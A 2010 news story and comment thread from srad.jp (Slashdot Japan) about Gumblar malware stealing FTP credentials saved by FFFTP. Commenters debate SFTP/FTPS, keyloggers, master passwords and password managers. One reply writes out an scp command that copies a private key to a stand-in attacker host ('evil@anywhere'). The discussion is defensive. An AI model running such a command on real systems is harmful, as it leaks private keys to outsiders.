パスワードを忘れた? アカウント作成
189219 story
セキュリティ

FTPクライアントのアカウント情報を盗むマルウェアに注意 66

ストーリー by hylom
パスワードは保存せず、できればSFTP/FTPSを利用しよう 部門より

あるAnonymous Coward 曰く、

フリーソフトウェアの人気FTPクライアント「FFFTP」で保存したアカウント情報を盗み取るマルウェアが話題になっている。FFFTPの作者はこれを受けてWebページに「お知らせ」を掲載、(サーバー側がSSLに対応している場合は)SSL対応FTPソフトへの切り替えやパスワードを保存させない、などの対策を行うよう伝えている。

なお、対策として別のFTPクライアントへの乗り換えをすすめる意見もあるが、ほかのFTPクライアントについても同様にアカウント情報を盗まれる可能性があるため、FTPクライアントを変更するだけでは抜本的な解決にはならない。また、FTP通信が盗聴されてログイン情報が盗まれるケースもあるようだ。FTPは平文で認証情報を送信するため、可能な限りSFTPやFTPSといった暗号化通信を行うプロトコルを利用し、またクライアント側にはパスワードを保存させない、もし保存させていたらそれをクリアしておく、といった対処が必要だろう。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • by Anonymous Coward on 2010年02月01日 11時40分 (#1711741)

    マルウェアを自機に招き入れた時点で、自分の権限でできる何をされてもおかしくはないと思うんだけど。
    現時点における主要ターゲットがその人気FTPクライアントであることは事実だろうけど、乗り換えたところでそれは
    「Macなら安心」程度の対策でしかない。

    • by ogino (1668) on 2010年02月01日 12時31分 (#1711783) 日記

      「Macなら安心」程度の対策でしかない。

      Mac OS X 10.5 から Keychain.app に ssh-agent の機能が追加されたので、私はここに SSH の鍵を登録して安心しています。(使い方は man ssh-add しましょう)

      $ ssh-add -K /path/to/private_key_file

      # という話ではない?

      親コメント
      • by Anonymous Coward

        という話ではない。

      • by Anonymous Coward

        $ scp /path/to/private_key_file evil@anywhere:~/

        • $ scp /path/to/private_key_file evil@anywhere:~/

          そのためのパスフレーズとパスフレーズのキーチェインへの保管でしょう。

          キーチェイン自体 (~/Library/Keychains/*) だって盗まれる可能性はありますが、ログインパスワードで暗号化されているので簡単には割れないというお話です。

          親コメント
    • by Anonymous Coward on 2010年02月01日 12時44分 (#1711791)
      確かにFTPからSCPにした所で、秘密鍵とキーロガーによりパスフレーズを取られたらお仕舞いですね。
      OTPを使って別計算機でレスポンス計算すれば「少しは安全」程度かな。
      親コメント
      • by JULY (38066) on 2010年02月01日 14時44分 (#1711845)

        OTPを使って別計算機でレスポンス計算すれば「少しは安全」程度かな。

        その別計算機にキーロガーが仕込まれて...

        という、エンドレスな話はさておいて(そもそも、キーロガーを入れられた上で安全な通信、というのは絶望的だと思いますが)、キーロガーって、そんなに簡単に入れられるのかなぁ。例えば、Windows の制限付きユーザで利用していた場合、Windows 自体の脆弱性で権限のエレベーションがある、という場合を除いて、任意のアプリケーションのキー入力を取得する、という事は出来る? もちろん、管理者権限を持つユーザで作業したときに突っ込まれた、というのはあり得るだろうけど、管理者権限を持つユーザを介さない形で、キーロガーを仕込めるかどうか。

        まぁ、実態として、管理者権限を持ったユーザで普通に利用している人が多いとは思うが...。Vista 以降なら UAC が障壁になることも有るだろうけど、UAC を無効にするバッドノウハウも広く使われている気がするし...。

        親コメント
        • by Anonymous Coward on 2010年02月01日 14時59分 (#1711856)

          Windowsでは、同じデスクトップで動作している任意のアプリケーションから、管理者権限なしでキー入力を盗みとれます。これはWindowsの仕様で、これに依存したアプリが星の数ほどあるのでどうしようもありません(Vistaから少しはやりにくくなってますが)。また安易に完全禁止してしまうと、たとえばソフトウェアキーボードやIMEや障害者用のアクセシビリティツールはどうしたらいいのだという問題が発生します。
          こちらの、想定されるウィッシュリスト [hatena.ne.jp]を見ればわかるように、あらゆるアプリケーションに影響が及ぶOSの仕様変更は簡単ではないのです。

          親コメント
          • たとえばソフトウェアキーボードやIMEや障害者用のアクセシビリティツールはどうしたらいいのだという問題が発生します。

            あっ、そりゃそうですね。

            特定のアプリケーションに向けられたキー入力に対して、横取り出来るプログラムをホワイトリストで指定する、みたいな仕組みがあると良いんだろうけど、難しそうだなぁ...

            親コメント
            • by Anonymous Coward

              UACの前例をみる限り、「ホワイトリストに追加しますか?」の連発を鬱陶しく思って機能そのものを切られるか、思考停止して無条件で「はい」を押す様になるだけのような気が。

              #教訓。どんなにしつこく警告を出しても、見ない人にとっては何も映っていないのと同じ。

        • PS/2ポートやUSBポートに刺さるキーロガーが売ってたけど
    • 現金を、給料袋と書いた封筒に入れて机の上に放置しておくか、暗証番号が自分の誕生日な安い金庫に入れておくか、タンスの奥のぱっと見そうとは分からない隠し戸棚に仕舞っておくか、ビニール袋に入れてトイレの貯水槽にしまっておくか、まともな金庫にしまっておくか、・・・ぐらいの違い。どれぐらい効果があるのかは侵入者の程度にもよる。まずは戸締まりをきっちりしよう。

      # この一見普通の小物入れ、実はここをこうやってこうやってこうやると、奥の隠し引き出しが開きます。
      # ここに仕舞っておけば、誰にも見つけられずに安心ですね! ってテレビショッピングでやってて吹いた。
      # おもいきり宣伝しちゃだめだろ。
      親コメント
    • マルウェアじゃないけど、ユーザアカウントを貸してくれる友達が多くて驚く。
      「ちょっとブラウザ使わせてー」「いいよー」みたいな感じで。
      確認したこと無いけど、普通に保存されてる予感。
      # Chromeだと、オプション>個人設定>保存したパスワードを表示。他ブラウザもだいたい同じ。

      判ってれば当然なんだけど、ぼちぼち判らない人向けにこの手の設定って安全側に倒した設計にすべきなんじゃないのかなあ。マスターパスワード強制、みたいに。
      あと平文でネットワークに流すプロトコル……は、もはやあんまり判ってない人は使わないか:-P

      親コメント
    • マスターパスワードを設定しないで保存していたら、原理的には FFFTP と同じです。マスターパスワードを設定すれば、それをキーに暗号化されるので、マスターパスワードを何らかの形で(キーロガーなり、ブルートフォースなり)取得しないと、保存しているアカウント情報からパスワードは取得出来ないはずです。

      それよりも、FFFTP なんていう日本ローカルでメジャーなソフトのレジストリが漁られた、というのは意外な気がしたなぁ。同様のことは WinSCP でも FileZilla でも起こると思うのだが...。それとも、既に起こってる?

      親コメント
      • by Anonymous Coward on 2010年02月01日 13時15分 (#1711812)

        > 同様のことは WinSCP でも FileZilla でも起こると思うのだが...。それとも、既に起こってる?
        Filezilla ではすでに起こっています。ネタ元のサイトに「Filezillaを使う場合、パスワードを決して保存しないでください」と書かれているのはそのため。
        WinSCPについては現時点で確認されていないようですが、WinSCPもオープンソースですから(オープンソースでなくても多少時間稼ぎできるだけですが)対応されるのは時間の問題でしょう。もしかしたらすでに対応済みで、確認されていないだけかもしれません。

        親コメント
      • >マスターパスワードを何らかの形で(キーロガーなり、ブルートフォースなり)取得しないと、保存しているアカウント情報からパスワードは取得出来ないはずです。

        これは正しいけど、「保存しているアカウント情報から」取得できないだけで、ftpやhttpなど平文パスワードの通信方式なら「通信から」取得できる(そしてそれはマルウェアが入ってる時点で可能)ので、マスターパスワードの設定さえすれば安心という誤解を招くのでは

        この書き方も、平文でないSFTP,FTPS,SSLなら安心という誤解を招きかねないが、これらは「通信から」取得できなくても「キー入力から」取得できる(そしてそれはマルウェアが入ってる時点で可能)ので、結局#1711741 [srad.jp]の言うようにマルウェアが入った時点で何やってもだめ。Gumblarはそこまで見ないようだからadhocな対策にはなるかもしれないけど。

        親コメント
      • by Anonymous Coward
        確かに意外。FileZillaなんか平文でXMLファイルに保存されてるのに。
    • by Anonymous Coward on 2010年02月01日 12時04分 (#1711764)
      オープンソースでなくても、パスワード保存するなら、盗まれる可能性はある。
      保存してなくても、ユーザー入力するならロガー仕込まれたら盗まれる。

      どちらにしても、侵入されたりマルウェア仕込まれる状況になったら、盗まれるリスクは同じ。
      ロガーは使わなければ大丈夫かもしれんけど、そんなものは侵入された後では誤差の範囲
      親コメント
    • by Anonymous Coward on 2010年02月01日 12時12分 (#1711770)

      オープンソースであろうがなかろうが感染した時点でアウト。こういうのは暗号化ではなく難読化というべきですね。
      Windows Vista以降であれば保護モードを突破されない限りマルウェアから設定を読まれないような対策は可能ですが(参考 [hatena.ne.jp])、現時点で保護モードに対応しているブラウザは純正のIEくらいしかないような。あとインストーラがレジストリに一行追加するだけでプラグインを保護モードから抜け出させることが可能なので、プラグインの開発元が手抜きしていると台無しです。

      親コメント
    • by Anonymous Coward

      オープンソースか否かは全く問題ではありませんね

      むしろパスワードで管理すると言うイフタフ ヤー シムシム的なものは既に時代遅れでしょう

    • by Anonymous Coward

      オレ様エンコード/デコードしているので解読された。
      それなりのAPI(CryptProtectData APIとか)を使っていれば製造者責任は問われない
      し、APIのバージョンアップも期待できるのに。

      • by Anonymous Coward

        FFFTPは歴史長いソフトだし、未だにWin9x系を対象に含めているので
        Win2000以降から導入されたCryptProtectDataを使うのは難しかったのでは?

      • by Anonymous Coward

        製造者責任は知らないのでおいといて、
        CryptProtectData API使ってても暗号化のキー情報が何処かに保存されていれば安全とは言えないですよね。
        #ただし同一ユーザに限る

  • by Anonymous Coward on 2010年02月01日 11時41分 (#1711746)

    今度はキーロガーに盗まれる可能性がありますし、キーロガーを備えたGumblarの亜種はすでに存在したという噂もありますが、少なくともFTPクライアントを起動すらしていないのに感染した瞬間盗まれることはなくなります、くらいは書いておかないと。
    それに、基本的に「感染した時点で負け」なんだから感染しないための対策(各種パッチで最新にしておく、ゼロデイが発見されていても更新が遅い上自動更新の仕組みもないAdobe ReaderのJavaScriptは無効にしておく等)を書いておくべきでしょう。
    それにしても「オープンソースだから暗号を解読できます」と(しかも作者本人が)書いてるのってどうなの。マルウェア作者はリバースエンジニアリングが違法かどうかなんて気にしませんよ? WinnypやPerfect Darkの暗号はどうやって解読されたと思ってるんでしょうか?

    • by Anonymous Coward on 2010年02月01日 12時01分 (#1711761)

      FFFTP作者さんの発言 [biglobe.ne.jp]は、

      FFFTPはパスワードをレジストリに記録しております。簡単な暗号化をかけてありますが、FFFTPはオープンソースであるため、暗号の解除はプログラムソースを解析すれば可能です。

      と、「ソースから解析することができる」とおっしゃっているだけです。
      違法かどうかを言っているのではなく、「(逆アセンブルなどのリバースエンジニアリング手法を用いる必要がある)ソース非公開プログラムより、解析の難易度が低い」ということでは?

      親コメント
      • Re: (スコア:0, 参考になる)

        by Anonymous Coward

        確かにオープンソースでなかった場合のことについて何も言っていないというのは論理的には正しいのですが、現に「オープンソースだから云々」という流言飛語が飛び交っているところを見ると、ちょっとうかつな発言だったと思います。じゃあ「ALFTP [vector.co.jp]に乗り換えれば安心だね」とか考えられると有害ですらあります。
        # そんなこと考える奴が悪い? それを言ったらそもそもGumblarに感染する奴が悪いでしょ。Gumblarに感染するバカが相手であることが前提なのをお忘れなく。
        ただ作者本人が「感染した時点で何しても無駄です」とか言っても居直りとしか受け止められない可能性があるのが難しいところですね…。

    • by Anonymous Coward
      > FFFTPはパスワードをレジストリに記録しております。簡単な暗号化をかけてありますが、FFFTPはオープンソースであるため、暗号の解除はプログラムソースを解析すれば可能です。
      この行ですか。ソースを解析すれば可能と書いてるんだから正解だと思いますが。バイナリを解析しても可能でしょうけど。
      マスターキーを起動時に入力させればいんじゃ?とも思いますが、パスワードをレジストリ保存するユーザーはそれもウザイんでしょうね。
      ターゲットにされたソフトの作者としては、イタチごっこだとしても何らかの対応は求められるわけで、今後も戦いは続きそうですね。
    • by Anonymous Coward
      「解読」という言葉の使い方が間違っています。
  • by Anonymous Coward on 2010年02月01日 11時48分 (#1711752)
    乗り換えを推奨してるわけじゃないと思うんだけど。
    ちゃんと他のソフトにしてもこうなるよっていう
    説明をしてあるし。

    geocitiesやfc2とか無料webスペースを提供してるところは
    FTPしか使えないのがほとんどだし、ロリポなんかの初心者向け
    レンサバもそうだよね。
    どうなることやら。
    • by poison (31175) on 2010年02月01日 12時06分 (#1711766)
      >乗り換えを推奨してるわけじゃないと思うんだけど。
      そうなのだけど。

      わたしの周りでは、乗り換えればOKだと思う人が続出してました。

      FFFTPの脆弱性と思った人が多い。
      親コメント
      • 同じく、最初聞いた時はFFFTPの脆弱性かと錯覚しました。

        1. Gumblarは元々FTPプロトコルを標的にするウィルスで、
        2. FTPパスワードのクラック対象としてFFFTPの設定を狙う亜種が出てきたため
        3. FFFTP導入環境で件の亜種に侵入されると、パスワードをクラックされる虞がある

        という前提つきの話なのが、前提になっているGumblarの亜種の話がすっぽ抜けて「FFFTP」「FTPパスワードが流出」の部分だけでインパクトのある噂として伝わっている(?)ため、「FFFTPの脆弱性により、FTPパスワードが流出する(KB******、緊急)」みたいな話である、という誤解を招いている印象があります。

        親コメント
      • by Anonymous Coward

        「Winnyを使わなきゃいいんでしょ」と同じメンタリティですよ。「じゃあShareで」「Perfect Darkで」「Freenetで」というところまでそっくりだし。ある意味そういう認識を定着させてしまったWinnyの責任かも。

        • by 127.0.0.1 (33105) on 2010年02月01日 16時15分 (#1711901) 日記
          そういう認識を定着させた責任があるのはWinny(やその開発者)自身じゃなくて、
          マスコミやセキュリティ関係者、システム管理者その他諸々だと思うね。

          包丁で殺人はできるのと同様に、銃やバールのようなものやトンファーでも
          殺人ができると人々が認識しているのは包丁のせいではない。

          #トンファー言いたいだけだったのでID
          親コメント
        • by Anonymous Coward
          まだ「やられた方よりやった方が悪い」とサイバーノーガード戦法を有効としてしまった、とするならわかるが、
          そこまで牽強付会されると最後の一段だけ「ところで」と政権批判を始めるわけのわからないコラムと変わらない。
          winnyにかこつければ何でも悪イメージにできるって論理も十分衆愚的だと思うんだ。
    • by Anonymous Coward on 2010年02月01日 16時11分 (#1711899)

      暗号化通信により安全にファイルを転送できるFTPS/SFTP/FTPクライアント「FileZilla」 - SourceForge.JP Magazine [osdn.jp]

      以下、リンク先の記事より引用。

      最近、FFFTPなどのFTPソフトからログイン情報を取得するマルウェアが話題になっている。しかし、FTPはもともとパスワードやファイルを暗号化せずに送受信するため、ほかのクライアントでも盗聴などにより情報を盗まれる可能性がある。そのため、SFTPやFTPSといったより強固なセキュリティを備えるプロトコルを利用することをおすすめしたい。今回紹介するのは、これらに対応する高機能FTP/FTPS/SFTPクライアント「FileZilla」だ。

      これ、普通は「SFTPやFTPSの使えるFileZillaなら安心」と読むよね。FileZillaにも同様の問題が起こる可能性はある [srad.jp]という話なのに。

      このFileZillaの紹介記事へのリンクが、SF.JP Magazineの最新記事(1/30の記事なんですよ、これが)として/.Jのトップに今回のストーリーと同時に表示されてるのは、はっきり言って性質が悪いと思う。

      親コメント
    • >geocitiesやfc2とか無料webスペースを提供してるところは
      geocitiesに関しては HTTP経由のファイルマネージャが使えます。
      認証はhttps経由。yahoo共通のログインです。
      http://geocities.yahoo.co.jp/filemanager [yahoo.co.jp]
      EXアップロードでアップもできます。ブラウザがあればFTPが使えなくても問題ありません。
      今回の件に関するお知らせも1月13日付で出ています。
      http://geocities.yahoo.co.jp/v/info/index.html [yahoo.co.jp]
      昔のgeoのFTPは、yahooとは別のパスワードだったですが、前に統合されてしまいました。
      そのかわりFTPに対して、ログインを試みると「ログイン履歴」に [yahoo.co.jp]
      「ジオシティーズ(※)」として日時、接続元IP、認証結果などが表示されるので、外部から攻撃されたときは分かります。
      ただし、今回のウィルスは感染時自分のPCからFTPで書き換えることもあるので、自分のログインと区別はつきません。

      # いろいろ考えたけど一番安全そうなのは、「NET未接続/外部メディア系一切使用不可のPCからCD/DVDを焼いて
      # 表面にサインを書きサーバ担当に郵送する(サーバーが同じ建物ならサイン郵送は不要)」ぐらいしか思いつかなかった

      親コメント
    • by Anonymous Coward
      "そこそこメジャーな手段(ソフト)はターゲットになってますよ"って話ですよね
      亜種なんかで更新されるという状況も想定してちゃんと対策しましょうってことで
  • by Anonymous Coward on 2010年02月01日 14時21分 (#1711838)
    アプリケーション単位でパスワードを保存せず
    keepass などのパスワード管理ツール使えばいいのに。
    この手の手口には効果あるんだけどな。

    クライアントPCのハードディスクにはクリアパスワードは一切記録しない
    ようにして最終的に暗号化されだデータベースで記録してその都度、
    マスターパスワードで呼出す様にしている。

    アプリケーション毎にクリアパスワード記録させるなんて
    個人的には有り得ないけど、それが普通なんだよね。何を今更って感じ。
  • ハブがリピータハブか、スイッチングハブかを確認しましょう(古いハブならリピータハブの可能性あり)
    リピータハブの場合、ハブに繋がってるPCのうち1台でもウイルスに感染した場合、他の正常なPCのFTP通信を傍受してパスワードを抜かれる可能性があります。
    スイッチングハブなら、平文でのFTP通信でも↑みたいな盗聴は回避できるはずです。
    ただし、FTP通信するPC自体がウイルスに感染していたり、ルータが乗っとられてる場合は無意味。

    ルータが信用できない場合は暗号通信が有効。
    FTP通信するPC自体がウイルスに感染している場合にパスワードを抜かれない絶対的な方法なんてありません

typodupeerror

アレゲは一日にしてならず -- アレゲ見習い

読み込み中...